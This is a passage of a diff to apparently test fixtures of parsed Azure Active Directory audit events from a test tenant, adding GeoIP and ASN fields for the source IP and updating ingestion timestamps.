{\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -344,6 +368,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -488,7 +524,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124832900Z", + "ingested": "2021-12-14T14:48:43.176635857Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -515,6 +551,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -668,7 +716,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124839500Z", + "ingested": "2021-12-14T14:48:43.176636547Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -695,6 +743,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -848,7 +908,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124846300Z", + "ingested": "2021-12-14T14:48:43.176637243Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -875,6 +935,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1041,7 +1113,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124852900Z", + "ingested": "2021-12-14T14:48:43.176637941Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ 